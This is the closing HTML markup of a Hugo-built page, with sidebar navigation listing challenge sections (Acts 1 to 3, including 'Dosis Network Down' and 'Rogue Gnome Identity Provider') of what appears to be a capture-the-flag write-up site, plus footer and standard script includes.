          <hr class="padding">
        </div>
        <div class="R-sidebarmenu R-shortcutmenu-headercontrols">
          <ul class="">
          </ul>
        </div>
        <div class="R-menu-divider default-animation">
          <hr class="padding">
        </div>
      </div>
      <div id="R-content-wrapper" class="highlightable">
        <div class="R-sidebarmenu R-shortcutmenu-main">
          <ul class="enlarge morespace collapsible-menu">
            <li class="" data-nav-url="/act1/index.html"><a class="padding" href="/act1/index.html">Act 1</a><ul id="R-subsections-8dc0c36ceefa45529ff4cf1f9bdc1f66" class="collapsible-menu"></ul></li>
            <li class="parent " data-nav-url="/act2/index.html"><a class="padding" href="/act2/index.html">Act 2</a><ul id="R-subsections-9d3d8c898368693a495088de36411fa6" class="collapsible-menu">
            <li class="" data-nav-url="/act2/retro-recovery/index.html"><a class="padding" href="/act2/retro-recovery/index.html">Retro Recovery</a></li>
            <li class="" data-nav-url="/act2/mail-detective/index.html"><a class="padding" href="/act2/mail-detective/index.html">Mail Detective</a></li>
            <li class="" data-nav-url="/act2/idorable-bistro/index.html"><a class="padding" href="/act2/idorable-bistro/index.html">Idorable Bistro</a></li>
            <li class="active " data-nav-url="/act2/dosis-network-down/index.html"><a class="padding" href="/act2/dosis-network-down/index.html">Dosis Network Down</a></li>
            <li class="" data-nav-url="/act2/rogue-gnome-identity-provider/index.html"><a class="padding" href="/act2/rogue-gnome-identity-provider/index.html">Rogue Gnome Identity Provider</a></li>
            <li class="" data-nav-url="/act2/quantognome-leap/index.html"><a class="padding" href="/act2/quantognome-leap/index.html">Quantognome Leap</a></li>
            <li class="" data-nav-url="/act2/going-in-reverse/index.html"><a class="padding" href="/act2/going-in-reverse/index.html">Going in Reverse</a></li></ul></li>
            <li class="" data-nav-url="/act3/index.html"><a class="padding" href="/act3/index.html">Act 3</a></li>
          </ul>
        </div>
        <div class="R-sidebarmenu R-shortcutmenu-shortcuts">
          <ul class="space collapsible-menu">
          </ul>
        </div>
        <div id="R-footer-margin"></div>
        <div class="R-menu-divider default-animation">
          <hr class="padding">
        </div>
        <div class="R-sidebarmenu R-shortcutmenu-footercontrols">
          <ul class="">
          </ul>
        </div>
<div id="R-footer"><p>Built with <a href="https://github.com/McShelby/hugo-theme-relearn" title="love"><i class="fas fa-heart"></i></a> by <a href="https://gohugo.io/">Hugo</a></p></div>
      </div>
    </aside>
    <script src="/js/clipboard/clipboard.min.js?1764489759" defer></script>
    <script src="/js/perfect-scrollbar/perfect-scrollbar.min.js?1764489759" defer></script>
    <script src="/js/theme.js?1764489759" defer></script>
  </body>
</html>
